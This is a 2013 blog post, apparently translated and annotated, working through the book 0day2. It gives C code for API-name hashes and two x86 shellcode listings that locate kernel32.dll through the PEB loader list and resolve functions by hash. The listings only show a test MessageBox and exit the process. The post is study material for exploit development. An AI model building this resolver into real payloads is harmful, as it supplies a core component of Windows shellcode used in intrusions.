Book review: 0day2 [4] — dynamically acquiring function addresses.


Through the previous three articles we learned how to obtain the base address of kernel32.dll; next we obtain several important functions from it.

1. GetProcAddress 2. LoadLibrary. With these two functions many other functions can be found, so the ultimate purpose of this section is to locate those two. To make testing and verification easier we also dynamically acquire MessageBoxA (to pop up a dialog window) and, so that the test program exits cleanly, ExitProcess.


Then, combining the knowledge from chapter 3 of 0day2, we search for each function by the hash of its name and so obtain the function address indirectly.

First we compute the hashes.

 1 #include "stdafx.h"
 2 #include <stdio.h>
 3 #include <windows.h>
/*
 * GetHash - compute the 32-bit name hash used by the shellcode below.
 * For every byte of fname: rotate the running value right by 7 bits, then add
 * the byte. The byte is added as a plain char (signed on MSVC), which is what
 * the shellcode's `movsx` reproduces; ASCII names are unaffected either way.
 * Side effect: prints the name and the resulting hash to stdout.
 * fname: NUL-terminated function name (must not be NULL).
 * Returns the hash, e.g. 0x1e380a6a for "MessageBoxA".
 */
DWORD GetHash(char *fname)
{
    DWORD h = 0;
    char *p;

    printf("%s",fname);
    for (p = fname; *p != '\0'; p++)
    {
        h = (h >> 7) | (h << 25);   /* ror h, 7 */
        h += *p;
    }
    printf(" function`s hash is %.8x\n",h);
    return h;
}
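/*
 * Print the hashes of the four API names the shellcode resolves.
 * argc/argv are unused. Returns 0.
 */
int main(int argc, char* argv[])
{
    //char fname[]={"MessageBoxA"};
    //DWORD dret = GetHash(fname);
    /* The original called Gethash(); C is case-sensitive, so that does not compile. */
    GetHash("ExitProcess");
    GetHash("MessageBoxA");
    GetHash("LoadLibraryA");
    GetHash("GetProcAddress");
    return 0;
}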
MessageBoxA function`s hash is 1e380a6a
ExitProcess function`s hash is 4fd18963
LoadLibraryA function`s hash is 0c917432
GetProcAddress function`s hash is bbafdf85

Output of running the code above.



// Listing 1 (Win7 only, see the note below the listing): resolve LoadLibraryA,
// ExitProcess and MessageBoxA by name hash, then call MessageBoxA and ExitProcess.
// Register roles:
//   esi = cursor over the pushed hash list (read with lodsd)
//   edi = cursor where resolved addresses are stored (written with stosd)
//   ebp = base of the module currently being searched
//   edx = running hash inside hash_loop
// The hash is the one computed by GetHash() above: ror 7, then add each (signed) byte.
    nop
    nop
    nop
    nop
    CLD                     // DF = 0: lodsd/stosd move forward
    push 0x1e380a6a         // hash("MessageBoxA")  -> ends up at [esp+8]
    push 0x4fd18963         // hash("ExitProcess")  -> [esp+4]
    push 0x0c917432         // hash("LoadLibraryA") -> [esp]
    //push 0xbbafdf85       // hash("GetProcAddress"), not used in this listing
    mov esi,esp             // esi = first hash in the list (LoadLibraryA, since the GetProcAddress push is commented out)
    lea edi,[esi+0x0c]      // edi = first dword above the hash list; resolved addresses are stored there,
                            // i.e. they overwrite whatever the caller had on the stack above the list

    // reserve 0x400 bytes below the hash list so later pushes/calls do not overwrite it
    xor ebx,ebx             // ebx = 0
    mov bh,0x04             // ebx = 0x400 without a 32-bit immediate
    sub esp,ebx             // esp -= 0x400

    // build "user32\0\0" on the stack and push a pointer to it (argument for LoadLibraryA)
    mov bx,0x3233           // "32"; the upper half of ebx is still 0 and supplies the terminator
    push ebx
    push 0x72657375         // "user"
    push esp                // pointer to "user32"
    xor edx,edx             // edx = 0

    // find base addr of kernel32.dll through the PEB loader list
    mov ebx,fs:[0x30]       // PEB (32-bit Windows)
    mov ecx,[ebx +0x0c]     // PEB->Ldr
    mov ecx,[ecx +0x1c]     // InInitializationOrderModuleList, first entry
    mov ecx,[ecx]           // second entry
    mov ecx,[ecx]           // third entry: needed on Win7, comment out on XP (the list order differs)
    mov ebp,[ecx +0x08]     // ebp = DllBase of that entry, assumed to be kernel32.dll

find_lib_functions:

    lodsd                   // eax = next hash from the list, esi += 4
    cmp eax,0x1e380a6a      // is this the MessageBoxA hash?

    jne find_functions      // no: resolve it in the module ebp points at
    // yes: MessageBoxA is in user32, so first call LoadLibraryA (the first stored address,
    // at [edi-8]); the xchg pair turns ebp into user32's base while keeping the hash in eax
    xchg eax,ebp
    call [edi - 0x8]        // LoadLibraryA(<pointer to "user32" pushed above>) -> eax = user32 base
    xchg eax,ebp            // ebp = user32 base, eax = hash("MessageBoxA") again

find_functions:
    pushad                  // save all registers; the hash in eax is now at [esp+0x1c]
    mov eax,[ebp+0x3c]      // e_lfanew
    mov ecx,[ebp+eax+0x78]  // RVA of the export directory (DataDirectory[0])
    add ecx,ebp             // ecx = IMAGE_EXPORT_DIRECTORY
    mov ebx,[ecx+0x20]      // AddressOfNames RVA
    add ebx,ebp             // ebx = table of name RVAs
    xor edi,edi             // edi = name index; pre-incremented below, so export name 0 is never checked

next_function_loop:
    inc edi
    mov esi,[ebx+edi*4]     // RVA of the edi-th export name
    add esi,ebp             // esi = name string
    cdq                     // edx = 0 (eax is non-negative here: e_lfanew, or the 0 terminator byte)

hash_loop:
    movsx eax,byte ptr[esi] // eax = sign-extended next byte of the name
    cmp al,ah               // al == ah only for 0x00 (or 0xff): end of string
    jz compare_hash
    ror edx,7               // same step as GetHash(): rotate right 7, add the byte
    add edx,eax
    inc esi
    jmp hash_loop

compare_hash:
    cmp edx,[esp+0x1c]      // compare with the hash saved by pushad
    jnz next_function_loop  // no match: next export name
    mov ebx,[ecx+0x24]      // AddressOfNameOrdinals RVA
    add ebx,ebp
    mov di,[ebx+2*edi]      // di = ordinal for this name (upper half of edi stays 0: the index is small)
    mov ebx,[ecx+0x1c]      // AddressOfFunctions RVA
    add ebx,ebp
    add ebp,[ebx +4*edi]    // ebp = module base + function RVA = resolved address
    xchg eax,ebp            // eax = resolved address
    pop edi                 // edi as saved by pushad = the storage cursor
    stosd                   // [edi] = resolved address; edi += 4
    push edi                // put the advanced cursor back into the pushad frame
    popad                   // restore the rest; eax = the hash again, edi advanced by 4
    cmp eax,0x1e380a6a      // was that MessageBoxA, the last hash in the list?
    jne find_lib_functions  // no: resolve the next hash

function_call:
    xor ebx,ebx             // ebx = 0
    push ebx                // terminator
    push 0x61616161         // "aaaa"
    push 0x62626262         // "bbbb": esp now points at the string "bbbbaaaa"
    mov eax,esp             // eax = pointer to that string
    push ebx                // uType = 0
    push eax                // lpCaption
    push eax                // lpText
    push ebx                // hWnd = NULL
    call [edi-0x04]         // MessageBoxA(NULL, "bbbbaaaa", "bbbbaaaa", 0); [edi-4] = last stored address
    push ebx                // uExitCode = 0
    call [edi-0x08]         // ExitProcess(0); [edi-8] = second stored address
    nop
    nop
    nop
    nop

The code above runs successfully on Win7 but is not compatible with XP; to test on XP, comment out line 31.


So we have to find a way around this.


To solve the XP/Win7 compatibility issue, the following code is taken from "watching the snow"; thanks to cryin.

But unfortunately that method does not work on Win7, so I am glad to share a new way, seen on a foreign web site, to locate the base address of kernel32.dll; this method works on all versions of Windows! It locates the base address by walking InInitializationOrderModuleList and checking the length of each module's name, because the last character of "kernel32.dll" is the "\0" terminator. (Original: 但非常可惜的是这种方法在Win7下是不适用的, 所以很高兴现在给大家分享国外网站上看到的一种新的方法来定位kernel32.dl的基地址, 该方法可以在所有windows版本上适用!这种方法通过在InInitializationOrderModuleList中查找kernel32.dll模块名称的长度来定位它的基地址, 因为"kernel32.dll"的最后一个字符为"\0"结束符) So if the module name's character at index 12 is "\0", you have located the kernel32.dll base address. 具体代码实现方法 (the concrete implementation):

;find kernel32.dll
find_kernel32:
    push esi
    xor ecx, ecx
    mov esi, [fs:ecx+0x30]
    mov esi, [esi + 0x0c]
    mov esi, [esi + 0x1c]
next_module:
    mov eax, [esi + 0x8]
    mov edi,[esi+0x20]
    mov esi ,[esi]
    cmp [edi+12*2],cx     // check whether the character at index 12 is the end of the string; "Kernel32.dll" has length 12
    jne next_module
    pop ESI
    Ret

After modification and testing (tested on both XP and Win7), the assembly code:



// Compatible with Win7 and XP: obtain the kernel32.dll base address, resolve the required functions and pop a test MessageBox.
// Listing 2 differs from listing 1 only in find_kernel32/next_module: instead of stepping a fixed
// number of entries into the loader list it walks the list until it finds a 12-character module name.
// Register roles:
//   esi = cursor over the pushed hash list (lodsd), edi = cursor for stored addresses (stosd),
//   ebp = base of the module being searched, edx = 0 outside hash_loop / running hash inside it.
// Reviewer note: the loader-list walk (fs:[0x30] -> +0x0c -> +0x1c) and the ror/add hash loop
// are the characteristic parts of this resolver pattern; they are typically what detection rules for it look for.
    _asm
    {
        nop
        nop
        nop
        nop
        CLD                             // DF = 0: lodsd/stosd move forward
        push 0x1e380a6a                 // hash("MessageBoxA")  -> ends up at [esp+8]
        push 0x4fd18963                 // hash("ExitProcess")  -> [esp+4]
        push 0x0c917432                 // hash("LoadLibraryA") -> [esp]
        //push 0xbbafdf85               // hash("GetProcAddress"), not used in this listing
        mov esi,esp                     // esi = first hash in the list (LoadLibraryA, since the GetProcAddress push is commented out)
        lea edi,[esi+0x0c]              // edi = first dword above the hash list; resolved addresses are stored there,
                                        // i.e. they overwrite whatever the caller had on the stack above the list

        // reserve 0x400 bytes below the hash list so later pushes/calls do not overwrite it

        xor ebx,ebx                     // ebx = 0
        mov bh,0x04                     // ebx = 0x400 without a 32-bit immediate
        sub esp,ebx                     // esp -= 0x400

        // build "user32\0\0" on the stack and push a pointer to it (argument for LoadLibraryA)
        mov bx,0x3233                   // "32"; the upper half of ebx is still 0 and supplies the terminator
        push ebx
        push 0x72657375                 // "user"
        push esp                        // pointer to "user32"
        xor edx,edx                     // edx = 0; used below both as the [fs:] index and as the 16-bit 0 in cmp

        // find base addr of kernel32.dll through the PEB loader list
    find_kernel32:
        mov ebx,fs:[edx + 0x30]         // PEB (32-bit Windows); edx is 0 — the original uses this form to avoid a 0x00 byte in the encoding
        mov ecx,[ebx +0x0c]             // PEB->Ldr
        mov ecx,[ecx +0x1c]             // InInitializationOrderModuleList, first entry
        //mov ecx,[ecx]                 // listing 1 stepped to the 2nd entry here ...
        //mov ecx,[ecx]                 // ... and the 3rd; replaced by the loop below
        push edi                        // the loop reuses edi; save the address cursor and the hash cursor
        push esi
    next_module:

        mov ebp,[ecx +0x08]             // DllBase of this entry
        mov edi,[ecx+0x20]              // pointer to this entry's module name (UTF-16, hence the *2 below);
                                        // the original comment "AddressOfNames" is misleading — that is the export-table field used later
        mov ecx,[ecx]                   // advance to the next entry (Flink)
        cmp [edi+12*2],dx               // is the character at index 12 the terminator? "kernel32.dll" has 12 characters
        jne next_module                 // not a 12-character name: keep walking
        // NOTE(review): any other 12-character module name earlier in the list would also match; the
        // check relies on kernel32.dll being the first such entry on the tested XP/Win7 systems.

        pop esi
        pop edi


    find_lib_functions:

        lodsd                           // eax = next hash from the list, esi += 4
        cmp eax,0x1e380a6a              // is this the MessageBoxA hash?

        jne find_functions              // no: resolve it in the module ebp points at
        // yes: MessageBoxA is in user32, so first call LoadLibraryA (the first stored address,
        // at [edi-8]); the xchg pair turns ebp into user32's base while keeping the hash in eax
        xchg eax,ebp
        call [edi - 0x8]                // LoadLibraryA(<pointer to "user32" pushed above>) -> eax = user32 base
        xchg eax,ebp                    // ebp = user32 base, eax = hash("MessageBoxA") again

    find_functions:
        pushad                          // save all registers; the hash in eax is now at [esp+0x1c]
        mov eax,[ebp+0x3c]              // e_lfanew
        mov ecx,[ebp+eax+0x78]          // RVA of the export directory (DataDirectory[0])
        add ecx,ebp                     // ecx = IMAGE_EXPORT_DIRECTORY
        mov ebx,[ecx+0x20]              // AddressOfNames RVA
        add ebx,ebp                     // ebx = table of name RVAs
        xor edi,edi                     // edi = name index; pre-incremented below, so export name 0 is never checked

    next_function_loop:
        inc edi
        mov esi,[ebx+edi*4]             // RVA of the edi-th export name
        add esi,ebp                     // esi = name string
        cdq                             // edx = 0 (eax is non-negative here: e_lfanew, or the 0 terminator byte)

    hash_loop:
        movsx eax,byte ptr[esi]         // eax = sign-extended next byte of the name
        cmp al,ah                       // al == ah only for 0x00 (or 0xff): end of string
        jz compare_hash
        ror edx,7                       // same step as GetHash(): rotate right 7, add the byte
        add edx,eax
        inc esi
        jmp hash_loop

    compare_hash:
        cmp edx,[esp+0x1c]              // compare with the hash saved by pushad
        jnz next_function_loop          // no match: next export name
        mov ebx,[ecx+0x24]              // AddressOfNameOrdinals RVA
        add ebx,ebp
        mov di,[ebx+2*edi]              // di = ordinal for this name (upper half of edi stays 0: the index is small)
        mov ebx,[ecx+0x1c]              // AddressOfFunctions RVA
        add ebx,ebp
        add ebp,[ebx +4*edi]            // ebp = module base + function RVA = resolved address
        xchg eax,ebp                    // eax = resolved address
        pop edi                         // edi as saved by pushad = the storage cursor
        stosd                           // [edi] = resolved address; edi += 4
        push edi                        // put the advanced cursor back into the pushad frame
        popad                           // restore the rest; eax = the hash again, edi advanced by 4
        cmp eax,0x1e380a6a              // was that MessageBoxA, the last hash in the list?
        jne find_lib_functions          // no: resolve the next hash

    function_call:
        xor ebx,ebx                     // ebx = 0
        push ebx                        // terminator
        push 0x61616161                 // "aaaa"
        push 0x62626262                 // "bbbb": esp now points at the string "bbbbaaaa"
        mov eax,esp                     // eax = pointer to that string
        push ebx                        // uType = 0
        push eax                        // lpCaption
        push eax                        // lpText
        push ebx                        // hWnd = NULL
        call [edi-0x04]                 // MessageBoxA(NULL, "bbbbaaaa", "bbbbaaaa", 0); [edi-4] = last stored address
        push ebx                        // uExitCode = 0
        call [edi-0x08]                 // ExitProcess(0); [edi-8] = second stored address
        nop
        nop
        nop
        nop
    }

This code is compatible with both XP and Win7.

Next we extract the shellcode and, combining it with the first lesson, do the overflow experiment.

Thanks to failwest, cryin


Posted by Noel at December 14, 2013 - 12:43 AM